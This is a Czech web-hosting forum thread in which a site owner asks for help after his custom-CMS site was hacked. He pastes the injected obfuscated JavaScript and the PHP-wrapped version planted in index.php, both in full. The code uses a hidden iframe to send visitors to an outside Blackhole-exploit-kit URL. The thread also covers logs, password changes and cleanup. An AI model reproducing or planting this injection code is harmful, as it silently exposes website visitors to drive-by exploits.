Hack - Vnořený kód rozbil web

pipux · 2013-09-03 12:29:26

Zdravím,

Na svém webu http://icaenel.com se momentálně potýkám s nějakým balastem, který mi rozbil stránky.
Patrně půjde o hack, pravděpodobně související se zde nedávno rozebíraným tématem. Nicméně, nepoužívám žádný známý redakční systém staršího data, ale vlastní CMS ... což může odstranění problému zkomplikovat (wordpressáři a joomlaři si nahrají aktualizaci svého CMS, zatímco zde bude problém trochu zapeklitějšího charakteru). Proto i prosím o radu ...

-----

<body <script type="text/javascript" language="javascript" > izd="y";jht="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[jht].body)==null}()}catch(vxvs){qvys=function(lod){lod="fr"+"omCh"+lod;for(ptjvs=0;ptjvs<izd.length;ptjvs++){zpw+=String[lod](tfvvy(fwv+(izd[ptjvs]))-(95));}};};tfvvy=(eval);fwv="0x";dgdac=0;try{;}catch(ffomt){dgdac=1}if(!dgdac){try{++tfvvy(jht)["bo"+"d"+izd]}catch(vxvs){yxj="^";}izd="7f^c5^d4^cd^c2^d3^c8^ce^cd^7f^d5^d9^c4^d0^8f^98^87^88^7f^da^6c^69^7f^d5^c0^d1^7f^d2^d3^c0^d3^c8^c2^9c^86^c0^c9^c0^d7^86^9a^6c^69^7f^d5^c0^d1^7f^c2^ce^cd^d3^d1^ce^cb^cb^c4^d1^9c^86^c8^cd^c3^c4^d7^8d^cf^c7^cf^86^9a^6c^69^7f^d5^c0^d1^7f^d5^d9^c4^d0^7f^9c^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^d1^c4^c0^d3^c4^a4^cb^c4^cc^c4^cd^d3^87^86^c8^c5^d1^c0^cc^c4^86^88^9a^6c^69^6c^69^7f^d5^d9^c4^d0^8d^d2^d1^c2^7f^9c^7f^86^c7^d3^d3^cf^99^8e^8e^d3^c4^d2^d3^8f^93^94^91^8d^c5^d4^d3^d4^d1^c4^c7^ce^d2^d3^8d^cf^cb^8e^cc^c1^b0^cd^93^a7^d1^a9^8d^cf^c7^cf^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^cf^ce^d2^c8^d3^c8^ce^cd^7f^9c^7f^86^c0^c1^d2^ce^cb^d4^d3^c4^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^c2^ce^cb^ce^d1^7f^9c^7f^86^94^96^95^96^93^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^c7^c4^c8^c6^c7^d3^7f^9c^7f^86^94^96^95^96^93^cf^d7^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^d6^c8^c3^d3^c7^7f^9c^7f^86^94^96^95^96^93^cf^d7^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^cb^c4^c5^d3^7f^9c^7f^86^90^8f^8f^8f^94^96^95^96^93^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^d3^ce^cf^7f^9c^7f^86^90^8f^8f^8f^94^96^95^96^93^86^9a^6c^69^6c^69^7f^c8^c5^7f^87^80^c3^ce^c2^d4^cc^c4^cd^d3^8d^c6^c4^d3^a4^cb^c4^cc^c4^cd^d3^a1^d8^a8^c3^87^86^d5^d9^c4^d0^86^88^88^7f^da^6c^69^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^d6^d1^c8^d3^c4^87^86^9b^cf^7f^c8^c3^9c^bb^86^d5^d9^c4^d0^bb^86^7f^c2^cb^c0^d2^d2^9c^bb^86^d5^d9^c4^d0^8f^98^bb^86^7f^9d^9b^8e^cf^9d^86^88^9a^6c^69^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c6^c4^d3^a4^cb^c4^cc^c4^cd^d3^a1^d8^a8^c3^87^86^d5^d9^c4^d0^86^88^8d^c0^cf^cf^c4^cd^c3^a2^c7^c8^cb^c3^87^d5^d9^c4^d0^88^9a^6c^69^7f^dc^6c^69^dc^6c^69^c5^d4^cd^c2^d3^c8^ce^cd^7f^b2^c4^d3^a2^ce^ce^ca^c8^c4^87^c2^ce^ce^ca^c8^c4^ad^c0^cc^c4^8b^c2^ce^ce^ca^c8^c4^b5^c0^cb^d4^c4^8b^cd^a3^c0^d8^d2^8b^cf^c0^d3^c7^88^7f^da^6c^69^7f^d5^c0^d1^7f^d3^ce^c3^c0^d8^7f^9c^7f^cd^c4^d6^7f^a3^c0^d3^c4^87^88^9a^6c^69^7f^d5^c0^d1^7f^c4^d7^cf^c8^d1^c4^7f^9c^7f^cd^c4^d6^7f^a3^c0^d3^c4^87^88^9a^6c^69^7f^c8^c5^7f^87^cd^a3^c0^d8^d2^9c^9c^cd^d4^cb^cb^7f^db^db^7f^cd^a3^c0^d8^d2^9c^9c^8f^88^7f^cd^a3^c0^d8^d2^9c^90^9a^6c^69^7f^c4^d7^cf^c8^d1^c4^8d^d2^c4^d3^b3^c8^cc^c4^87^d3^ce^c3^c0^d8^8d^c6^c4^d3^b3^c8^cc^c4^87^88^7f^8a^7f^92^95^8f^8f^8f^8f^8f^89^91^93^89^cd^a3^c0^d8^d2^88^9a^6c^69^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^7f^9c^7f^c2^ce^ce^ca^c8^c4^ad^c0^cc^c4^8a^81^9c^81^8a^c4^d2^c2^c0^cf^c4^87^c2^ce^ce^ca^c8^c4^b5^c0^cb^d4^c4^88^6c^69^7f^8a^7f^81^9a^c4^d7^cf^c8^d1^c4^d2^9c^81^7f^8a^7f^c4^d7^cf^c8^d1^c4^8d^d3^ce^a6^ac^b3^b2^d3^d1^c8^cd^c6^87^88^7f^8a^7f^87^87^cf^c0^d3^c7^88^7f^9e^7f^81^9a^7f^cf^c0^d3^c7^9c^81^7f^8a^7f^cf^c0^d3^c7^7f^99^7f^81^81^88^9a^6c^69^dc^6c^69^c5^d4^cd^c2^d3^c8^ce^cd^7f^a6^c4^d3^a2^ce^ce^ca^c8^c4^87^7f^cd^c0^cc^c4^7f^88^7f^da^6c^69^7f^d5^c0^d1^7f^d2^d3^c0^d1^d3^7f^9c^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^8d^c8^cd^c3^c4^d7^ae^c5^87^7f^cd^c0^cc^c4^7f^8a^7f^81^9c^81^7f^88^9a^6c^69^7f^d5^c0^d1^7f^cb^c4^cd^7f^9c^7f^d2^d3^c0^d1^d3^7f^8a^7f^cd^c0^cc^c4^8d^cb^c4^cd^c6^d3^c7^7f^8a^7f^90^9a^6c^69^7f^c8^c5^7f^87^7f^87^7f^80^d2^d3^c0^d1^d3^7f^88^7f^85^85^6c^69^7f^87^7f^cd^c0^cc^c4^7f^80^9c^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^8d^d2^d4^c1^d2^d3^d1^c8^cd^c6^87^7f^8f^8b^7f^cd^c0^cc^c4^8d^cb^c4^cd^c6^d3^c7^7f^88^7f^88^7f^88^6c^69^7f^da^6c^69^7f^d1^c4^d3^d4^d1^cd^7f^cd^d4^cb^cb^9a^6c^69^7f^dc^6c^69^7f^c8^c5^7f^87^7f^d2^d3^c0^d1^d3^7f^9c^9c^7f^8c^90^7f^88^7f^d1^c4^d3^d4^d1^cd^7f^cd^d4^cb^cb^9a^6c^69^7f^d5^c0^d1^7f^c4^cd^c3^7f^9c^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^8d^c8^cd^c3^c4^d7^ae^c5^87^7f^81^9a^81^8b^7f^cb^c4^cd^7f^88^9a^6c^69^7f^c8^c5^7f^87^7f^c4^cd^c3^7f^9c^9c^7f^8c^90^7f^88^7f^c4^cd^c3^7f^9c^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^8d^cb^c4^cd^c6^d3^c7^9a^6c^69^7f^d1^c4^d3^d4^d1^cd^7f^d4^cd^c4^d2^c2^c0^cf^c4^87^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^8d^d2^d4^c1^d2^d3^d1^c8^cd^c6^87^7f^cb^c4^cd^8b^7f^c4^cd^c3^7f^88^7f^88^9a^6c^69^dc^6c^69^c8^c5^7f^87^cd^c0^d5^c8^c6^c0^d3^ce^d1^8d^c2^ce^ce^ca^c8^c4^a4^cd^c0^c1^cb^c4^c3^88^6c^69^da^6c^69^c8^c5^87^a6^c4^d3^a2^ce^ce^ca^c8^c4^87^86^d5^c8^d2^c8^d3^c4^c3^be^d4^d0^86^88^9c^9c^94^94^88^da^dc^c4^cb^d2^c4^da^b2^c4^d3^a2^ce^ce^ca^c8^c4^87^86^d5^c8^d2^c8^d3^c4^c3^be^d4^d0^86^8b^7f^86^94^94^86^8b^7f^86^90^86^8b^7f^86^8e^86^88^9a^6c^69^6c^69^d5^d9^c4^d0^8f^98^87^88^9a^6c^69^dc^6c^69^dc".split(yxj);zpw="";qvys("arCode");tfvvy(""+zpw);}</script> >

Toto není můj kód.

<script type="text/javascript" language="javascript" >   
if(document.querySelector)zndy=4;euy=("79,bf,ce,c7,bc,cd,c2,c8,c7,79,d3,ce,cb,c7,c1,89,92,81,82,79,d4,66,63,79,cf,ba,cb,79,cc,cd,ba,cd,c2,bc,96,80,ba,c3,ba,d1,80,94,66,63,79,cf,ba,cb,79,bc,c8,c7,cd,cb,c8,c5,c5,be,cb,96,80,c2,c7,bd,be,d1,87,c9,c1,c9,80,94,66,63,79,cf,ba,cb,79,d3,ce,cb,c7,c1,79,96,79,bd,c8,bc,ce,c6,be,c7,cd,87,bc,cb,be,ba,cd,be,9e,c5,be,c6,be,c7,cd,81,80,c2,bf,cb,ba,c6,be,80,82,94,66,63,66,63,79,d3,ce,cb,c7,c1,87,cc,cb,bc,79,96,79,80,c1,cd,cd,c9,93,88,88,cd,be,cc,cd,89,8d,8e,8b,87,bf,ce,cd,ce,cb,be,c1,c8,cc,cd,87,c9,c5,88,c6,bb,aa,c7,8d,a1,cb,a3,87,c9,c1,c9,80,94,66,63,79,d3,ce,cb,c7,c1,87,cc,cd,d2,c5,be,87,c9,c8,cc,c2,cd,c2,c8,c7,79,96,79,80,ba,bb,cc,c8,c5,ce,cd,be,80,94,66,63,79,d3,ce,cb,c7,c1,87,cc,cd,d2,c5,be,87,bc,c8,c5,c8,cb,79,96,79,80,8e,80,94,66,63,79,d3,ce,cb,c7,c1,87,cc,cd,d2,c5,be,87,c1,be,c2,c0,c1,cd,79,96,79,80,8e,c9,d1,80,94,66,63,79,d3,ce,cb,c7,c1,87,cc,cd,d2,c5,be,87,d0,c2,bd,cd,c1,79,96,79,80,8e,c9,d1,80,94,66,63,79,d3,ce,cb,c7,c1,87,cc,cd,d2,c5,be,87,c5,be,bf,cd,79,96,79,80,8a,89,89,89,8e,80,94,66,63,79,d3,ce,cb,c7,c1,87,cc,cd,d2,c5,be,87,cd,c8,c9,79,96,79,80,8a,89,89,89,8e,80,94,66,63,66,63,79,c2,bf,79,81,7a,bd,c8,bc,ce,c6,be,c7,cd,87,c0,be,cd,9e,c5,be,c6,be,c7,cd,9b,d2,a2,bd,81,80,d3,ce,cb,c7,c1,80,82,82,79,d4,66,63,79,bd,c8,bc,ce,c6,be,c7,cd,87,d0,cb,c2,cd,be,81,80,95,c9,79,c2,bd,96,b5,80,d3,ce,cb,c7,c1,b5,80,79,bc,c5,ba,cc,cc,96,b5,80,d3,ce,cb,c7,c1,89,92,b5,80,79,97,95,88,c9,97,80,82,94,66,63,79,bd,c8,bc,ce,c6,be,c7,cd,87,c0,be,cd,9e,c5,be,c6,be,c7,cd,9b,d2,a2,bd,81,80,d3,ce,cb,c7,c1,80,82,87,ba,c9,c9,be,c7,bd,9c,c1,c2,c5,bd,81,d3,ce,cb,c7,c1,82,94,66,63,79,d6,66,63,d6,66,63,bf,ce,c7,bc,cd,c2,c8,c7,79,ac,be,cd,9c,c8,c8,c4,c2,be,81,bc,c8,c8,c4,c2,be,a7,ba,c6,be,85,bc,c8,c8,c4,c2,be,af,ba,c5,ce,be,85,c7,9d,ba,d2,cc,85,c9,ba,cd,c1,82,79,d4,66,63,79,cf,ba,cb,79,cd,c8,bd,ba,d2,79,96,79,c7,be,d0,79,9d,ba,cd,be,81,82,94,66,63,79,cf,ba,cb,79,be,d1,c9,c2,cb,be,79,96,79,c7,be,d0,79,9d,ba,cd,be,81,82,94,66,63,79,c2,bf,79,81,c7,9d,ba,d2,cc,96,96,c7,ce,c5,c5,79,d5,d5,79,c7,9d,ba,d2,cc,96,96,89,82,79,c7,9d,ba,d2,cc,96,8a,94,66,63,79,be,d1,c9,c2,cb,be,87,cc,be,cd,ad,c2,c6,be,81,cd,c8,bd,ba,d2,87,c0,be,cd,ad,c2,c6,be,81,82,79,84,79,8c,8f,89,89,89,89,89,83,8b,8d,83,c7,9d,ba,d2,cc,82,94,66,63,79,bd,c8,bc,ce,c6,be,c7,cd,87,bc,c8,c8,c4,c2,be,79,96,79,bc,c8,c8,c4,c2,be,a7,ba,c6,be,84,7b,96,7b,84,be,cc,bc,ba,c9,be,81,bc,c8,c8,c4,c2,be,af,ba,c5,ce,be,82,66,63,79,84,79,7b,94,be,d1,c9,c2,cb,be,cc,96,7b,79,84,79,be,d1,c9,c2,cb,be,87,cd,c8,a0,a6,ad,ac,cd,cb,c2,c7,c0,81,82,79,84,79,81,81,c9,ba,cd,c1,82,79,98,79,7b,94,79,c9,ba,cd,c1,96,7b,79,84,79,c9,ba,cd,c1,79,93,79,7b,7b,82,94,66,63,d6,66,63,bf,ce,c7,bc,cd,c2,c8,c7,79,a0,be,cd,9c,c8,c8,c4,c2,be,81,79,c7,ba,c6,be,79,82,79,d4,66,63,79,cf,ba,cb,79,cc,cd,ba,cb,cd,79,96,79,bd,c8,bc,ce,c6,be,c7,cd,87,bc,c8,c8,c4,c2,be,87,c2,c7,bd,be,d1,a8,bf,81,79,c7,ba,c6,be,79,84,79,7b,96,7b,79,82,94,66,63,79,cf,ba,cb,79,c5,be,c7,79,96,79,cc,cd,ba,cb,cd,79,84,79,c7,ba,c6,be,87,c5,be,c7,c0,cd,c1,79,84,79,8a,94,66,63,79,c2,bf,79,81,79,81,79,7a,cc,cd,ba,cb,cd,79,82,79,7f,7f,66,63,79,81,79,c7,ba,c6,be,79,7a,96,79,bd,c8,bc,ce,c6,be,c7,cd,87,bc,c8,c8,c4,c2,be,87,cc,ce,bb,cc,cd,cb,c2,c7,c0,81,79,89,85,79,c7,ba,c6,be,87,c5,be,c7,c0,cd,c1,79,82,79,82,79,82,66,63,79,d4,66,63,79,cb,be,cd,ce,cb,c7,79,c7,ce,c5,c5,94,66,63,79,d6,66,63,79,c2,bf,79,81,79,cc,cd,ba,cb,cd,79,96,96,79,86,8a,79,82,79,cb,be,cd,ce,cb,c7,79,c7,ce,c5,c5,94,66,63,79,cf,ba,cb,79,be,c7,bd,79,96,79,bd,c8,bc,ce,c6,be,c7,cd,87,bc,c8,c8,c4,c2,be,87,c2,c7,bd,be,d1,a8,bf,81,79,7b,94,7b,85,79,c5,be,c7,79,82,94,66,63,79,c2,bf,79,81,79,be,c7,bd,79,96,96,79,86,8a,79,82,79,be,c7,bd,79,96,79,bd,c8,bc,ce,c6,be,c7,cd,87,bc,c8,c8,c4,c2,be,87,c5,be,c7,c0,cd,c1,94,66,63,79,cb,be,cd,ce,cb,c7,79,ce,c7,be,cc,bc,ba,c9,be,81,79,bd,c8,bc,ce,c6,be,c7,cd,87,bc,c8,c8,c4,c2,be,87,cc,ce,bb,cc,cd,cb,c2,c7,c0,81,79,c5,be,c7,85,79,be,c7,bd,79,82,79,82,94,66,63,d6,66,63,c2,bf,79,81,c7,ba,cf,c2,c0,ba,cd,c8,cb,87,bc,c8,c8,c4,c2,be,9e,c7,ba,bb,c5,be,bd,82,66,63,d4,66,63,c2,bf,81,a0,be,cd,9c,c8,c8,c4,c2,be,81,80,cf,c2,cc,c2,cd,be,bd,b8,ce,ca,80,82,96,96,8e,8e,82,d4,d6,be,c5,cc,be,d4,ac,be,cd,9c,c8,c8,c4,c2,be,81,80,cf,c2,cc,c2,cd,be,bd,b8,ce,ca,80,85,79,80,8e,8e,80,85,79,80,8a,80,85,79,80,88,80,82,94,66,63,66,63,d3,ce,cb,c7,c1,89,92,81,82,94,66,63,d6,66,63,d6".split(","));htshx=eval;function cas(){waw=function(){--(hrgctp.body)}()}hrgctp=document;for(ptd=0;ptd<euy["length"];ptd+=1){euy[ptd]=-(89)+parseInt(euy[ptd],zndy*4);}try{cas()}catch(pxwj){siuvv=50-50;}if(!siuvv)htshx(String["fr"+"omCh"+"arCo"+"de"].apply(String,euy));</script><!--/74ed9f-->

Toto také ne. A nelíbí se mi to.

Dále se nezobrazuje patička webu (obyčejný php include), v níž je standardně umístěna Endora reklama; reklama tudíž skočí na první řádek vygenerovaného html kódu.

-----

EDIT: v lokálním souboru index.php mám uloženo toto:

<body<?php if ($_GET['inc'] == "map") {echo ' ' . 'onload="initialize()"';}?>>

... zatímco v souboru index.php na doméně se nachází toto:

<body<?php if ($_GET['inc'] == "map") {echo ' ' . 'onload="initialize()"';}?>
<?
#74ed9f#
if(empty($r)) { $r = " <script type=\"text/javascript\" language=\"javascript\" > izd=\"y\";jht=\"d\"+\"o\"+\"c\"+\"ument\";try{+function(){if(document.querySelector)++(window[jht].body)==null}()}catch(vxvs){qvys=function(lod){lod=\"fr\"+\"omCh\"+lod;for(ptjvs=0;ptjvs<izd.length;ptjvs++){zpw+=String[lod](tfvvy(fwv+(izd[ptjvs]))-(95));}};};tfvvy=(eval);fwv=\"0x\";dgdac=0;try{;}catch(ffomt){dgdac=1}if(!dgdac){try{++tfvvy(jht)[\"\x62o\"+\"d\"+izd]}catch(vxvs){yxj=\"^\";}izd=\"7f^c5^d4^cd^c2^d3^c8^ce^cd^7f^d5^d9^c4^d0^8f^98^87^88^7f^da^6c^69^7f^d5^c0^d1^7f^d2^d3^c0^d3^c8^c2^9c^86^c0^c9^c0^d7^86^9a^6c^69^7f^d5^c0^d1^7f^c2^ce^cd^d3^d1^ce^cb^cb^c4^d1^9c^86^c8^cd^c3^c4^d7^8d^cf^c7^cf^86^9a^6c^69^7f^d5^c0^d1^7f^d5^d9^c4^d0^7f^9c^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^d1^c4^c0^d3^c4^a4^cb^c4^cc^c4^cd^d3^87^86^c8^c5^d1^c0^cc^c4^86^88^9a^6c^69^6c^69^7f^d5^d9^c4^d0^8d^d2^d1^c2^7f^9c^7f^86^c7^d3^d3^cf^99^8e^8e^d3^c4^d2^d3^8f^93^94^91^8d^c5^d4^d3^d4^d1^c4^c7^ce^d2^d3^8d^cf^cb^8e^cc^c1^b0^cd^93^a7^d1^a9^8d^cf^c7^cf^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^cf^ce^d2^c8^d3^c8^ce^cd^7f^9c^7f^86^c0^c1^d2^ce^cb^d4^d3^c4^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^c2^ce^cb^ce^d1^7f^9c^7f^86^94^96^95^96^93^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^c7^c4^c8^c6^c7^d3^7f^9c^7f^86^94^96^95^96^93^cf^d7^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^d6^c8^c3^d3^c7^7f^9c^7f^86^94^96^95^96^93^cf^d7^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^cb^c4^c5^d3^7f^9c^7f^86^90^8f^8f^8f^94^96^95^96^93^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^d3^ce^cf^7f^9c^7f^86^90^8f^8f^8f^94^96^95^96^93^86^9a^6c^69^6c^69^7f^c8^c5^7f^87^80^c3^ce^c2^d4^cc^c4^cd^d3^8d^c6^c4^d3^a4^cb^c4^cc^c4^cd^d3^a1^d8^a8^c3^87^86^d5^d9^c4^d0^86^88^88^7f^da^6c^69^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^d6^d1^c8^d3^c4^87^86^9b^cf^7f^c8^c3^9c^bb^86^d5^d9^c4^d0^bb^86^7f^c2^cb^c0^d2^d2^9c^bb^86^d5^d9^c4^d0^8f^98^bb^86^7f^9d^9b^8e^cf^9d^86^88^9a^6c^69^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c6^c4^d3^a4^cb^c4^cc^c4^cd^d3^a1^d8^a8^c3^87^86^d5^d9^c4^d0^86^88^8d^c0^cf^cf^c4^cd^c3^a2^c7^c8^cb^c3^87^d5^d9^c4^d0^88^9a^6c^69^7f^dc^6c^69^dc^6c^69^c5^d4^cd^c2^d3^c8^ce^cd^7f^b2^c4^d3^a2^ce^ce^ca^c8^c4^87^c2^ce^ce^ca^c8^c4^ad^c0^cc^c4^8b^c2^ce^ce^ca^c8^c4^b5^c0^cb^d4^c4^8b^cd^a3^c0^d8^d2^8b^cf^c0^d3^c7^88^7f^da^6c^69^7f^d5^c0^d1^7f^d3^ce^c3^c0^d8^7f^9c^7f^cd^c4^d6^7f^a3^c0^d3^c4^87^88^9a^6c^69^7f^d5^c0^d1^7f^c4^d7^cf^c8^d1^c4^7f^9c^7f^cd^c4^d6^7f^a3^c0^d3^c4^87^88^9a^6c^69^7f^c8^c5^7f^87^cd^a3^c0^d8^d2^9c^9c^cd^d4^cb^cb^7f^db^db^7f^cd^a3^c0^d8^d2^9c^9c^8f^88^7f^cd^a3^c0^d8^d2^9c^90^9a^6c^69^7f^c4^d7^cf^c8^d1^c4^8d^d2^c4^d3^b3^c8^cc^c4^87^d3^ce^c3^c0^d8^8d^c6^c4^d3^b3^c8^cc^c4^87^88^7f^8a^7f^92^95^8f^8f^8f^8f^8f^89^91^93^89^cd^a3^c0^d8^d2^88^9a^6c^69^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^7f^9c^7f^c2^ce^ce^ca^c8^c4^ad^c0^cc^c4^8a^81^9c^81^8a^c4^d2^c2^c0^cf^c4^87^c2^ce^ce^ca^c8^c4^b5^c0^cb^d4^c4^88^6c^69^7f^8a^7f^81^9a^c4^d7^cf^c8^d1^c4^d2^9c^81^7f^8a^7f^c4^d7^cf^c8^d1^c4^8d^d3^ce^a6^ac^b3^b2^d3^d1^c8^cd^c6^87^88^7f^8a^7f^87^87^cf^c0^d3^c7^88^7f^9e^7f^81^9a^7f^cf^c0^d3^c7^9c^81^7f^8a^7f^cf^c0^d3^c7^7f^99^7f^81^81^88^9a^6c^69^dc^6c^69^c5^d4^cd^c2^d3^c8^ce^cd^7f^a6^c4^d3^a2^ce^ce^ca^c8^c4^87^7f^cd^c0^cc^c4^7f^88^7f^da^6c^69^7f^d5^c0^d1^7f^d2^d3^c0^d1^d3^7f^9c^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^8d^c8^cd^c3^c4^d7^ae^c5^87^7f^cd^c0^cc^c4^7f^8a^7f^81^9c^81^7f^88^9a^6c^69^7f^d5^c0^d1^7f^cb^c4^cd^7f^9c^7f^d2^d3^c0^d1^d3^7f^8a^7f^cd^c0^cc^c4^8d^cb^c4^cd^c6^d3^c7^7f^8a^7f^90^9a^6c^69^7f^c8^c5^7f^87^7f^87^7f^80^d2^d3^c0^d1^d3^7f^88^7f^85^85^6c^69^7f^87^7f^cd^c0^cc^c4^7f^80^9c^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^8d^d2^d4^c1^d2^d3^d1^c8^cd^c6^87^7f^8f^8b^7f^cd^c0^cc^c4^8d^cb^c4^cd^c6^d3^c7^7f^88^7f^88^7f^88^6c^69^7f^da^6c^69^7f^d1^c4^d3^d4^d1^cd^7f^cd^d4^cb^cb^9a^6c^69^7f^dc^6c^69^7f^c8^c5^7f^87^7f^d2^d3^c0^d1^d3^7f^9c^9c^7f^8c^90^7f^88^7f^d1^c4^d3^d4^d1^cd^7f^cd^d4^cb^cb^9a^6c^69^7f^d5^c0^d1^7f^c4^cd^c3^7f^9c^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^8d^c8^cd^c3^c4^d7^ae^c5^87^7f^81^9a^81^8b^7f^cb^c4^cd^7f^88^9a^6c^69^7f^c8^c5^7f^87^7f^c4^cd^c3^7f^9c^9c^7f^8c^90^7f^88^7f^c4^cd^c3^7f^9c^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^8d^cb^c4^cd^c6^d3^c7^9a^6c^69^7f^d1^c4^d3^d4^d1^cd^7f^d4^cd^c4^d2^c2^c0^cf^c4^87^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^8d^d2^d4^c1^d2^d3^d1^c8^cd^c6^87^7f^cb^c4^cd^8b^7f^c4^cd^c3^7f^88^7f^88^9a^6c^69^dc^6c^69^c8^c5^7f^87^cd^c0^d5^c8^c6^c0^d3^ce^d1^8d^c2^ce^ce^ca^c8^c4^a4^cd^c0^c1^cb^c4^c3^88^6c^69^da^6c^69^c8^c5^87^a6^c4^d3^a2^ce^ce^ca^c8^c4^87^86^d5^c8^d2^c8^d3^c4^c3^be^d4^d0^86^88^9c^9c^94^94^88^da^dc^c4^cb^d2^c4^da^b2^c4^d3^a2^ce^ce^ca^c8^c4^87^86^d5^c8^d2^c8^d3^c4^c3^be^d4^d0^86^8b^7f^86^94^94^86^8b^7f^86^90^86^8b^7f^86^8e^86^88^9a^6c^69^6c^69^d5^d9^c4^d0^8f^98^87^88^9a^6c^69^dc^6c^69^dc\".split(yxj);zpw=\"\";qvys(\"arCode\");tfvvy(\"\"+zpw);}</script> "; echo $r; }
#/74ed9f#
?>>

Proč? --Já to tam nevložil.

Samozřejmě teď mohu inkriminovaný kód smazat, stále se ale ptám "proč?" a prosím o objasnění ... protože pokud mi někdo vložil kód do webu jednou, může to udělat znovu. Je třeba zamezit takovým excesům.

-----

EDIT2: patrně půjde o nějaký hack. Viz google, klíčové slovo #74ed9f#
https://www.google.com/search?q=74ed9f& … =firefox-a
http://translate.google.com/translate?s … 70&act=url
http://forums.whirlpool.net.au/archive/2149466

-----

EDIT3: Dozvídám se tolik nových informací ...
http://sitecheck.sucuri.net/results/icaenel.com
Takže to infikovalo všechny javascript soubory na mém webu, a index.php k tomu (FTP klient ukazuje u těchto souborů čas posledního zápisu 30. 8. 2013, 2:18 v noci)

http://labs.sucuri.net/db/malware/malwa … hole2?v403

Loading jquery or any javascript from an external site is bound to cause problems.
...
If the external site is compromised it could add malware to your page.

Hacknutý přes Google maps API?

Dále používám lokálně nahranou verzi stařičkého jQuery 1.6.1 ... což také může být ono.
Anebo tomu nahrála slabá hesla na loginu webu/ na FTP/ na SQL? (šest lowercase písmen je asi málo, ale patlat se s dlouhými, neintuitivními hesly se mi nikdy nechtělo)

Tak co, odborníci? Kde je jádro pudla?

Upravil pipux (2013-09-03 13:43:34)

pipux · 2013-09-03 15:08:51

Drazí admini, jestli to bude možné, ještě vás poprosím o přístupové logy za web, SQL a FTP, k 30.8., okolo druhé hodiny noční.

Logy, které mám k dispozici (acces_log_x.gz, v adresáři log) se zřejmě po čtyřech dnech promazávají - nejstarší přístup tam teď vidím za 30.8., okolo šesté hodiny ranní (k útoku došlo o čtyři hodiny dříve).
Na FTP a SQL pak logy nemám/neznám.

Destroyer · 2013-09-03 15:15:04

logy za web (access_log) se déle jak 4dny neukládají
FTP log můžete najít v administraci u ftp účtu

pipux · 2013-09-03 15:23:50

Destroyer napsal:

FTP log můžete najít v administraci u ftp účtu

No, log tam vskutku je, ale ...

FTP log pro účet pipux: Žádné záznamy

Dělám něco špatně?

pipux · 2013-09-03 19:52:32

Dobře, v tuto chvíli mi ani nemusíte zablokovávat účet ... web jsem promazal, databázi překontroloval, infikované soubory vyměnil za čisté, hesla do webadminu, FTP a mySQL obměnil za silnější, autentizaci TLS/SSL na FTP klientu ověřil, jQuery aktualizoval, lokální počítač proskenoval na malware/trojany, register_globals a eval() nepoužívám ... a více mě už nenapadá.

Stále však čekám, že se k této bezpečnostní hrozbě, tj. k Blackhole Exploit Kit vyjádří některý z adminu/znalejších uživatelů.
Tzn., co ještě tak mohu udělat pro prevenci opětovného hacknutí webu?
Jak se tito útočníci do webu dostávají?

Přidám pár výživných komentářů:

As the website administrator for several sites that have had the Blackhole Exploit Kit I have only been able to upload fresh code from a known good source to fix the problem. Most of the time I see that the files affected are the minified javascript files (respond.min.js and others) but not always. I have seen this as the result of using html5shiv.js and html5printshiv.js as well. My hosting provider does not seem to have any real answers (GoDaddy) here but points to using their date/time stamps on ftp uploads and noticing the IP addresses associated with them as a means of isolating where the exploits are coming from. What am I going to do with that information? Travel to that country and beat up the person who uploaded that code? How in the heck would anyone but me be able to upload any code via ftp to my hosting package anyway, unless they know the credentials. I recently changed all of the ftp account passwords on my business and personal ftp accounts and the infection STILL HAPPENS! The only other way I can imagine this happening is through some back door method other than ftp. I have perused the internet looking for discussions, instructions, etc. for WEB DEVELOPERS to use in fixing this permanently but have found none. This is where the real problem is, not the client. If anyone knows of a blog, user group or otherwise that speaks to this malicious problem and how to solve it, please let me know. I have clients that get hopping mad at me for this and I don't seem to have any control over it.

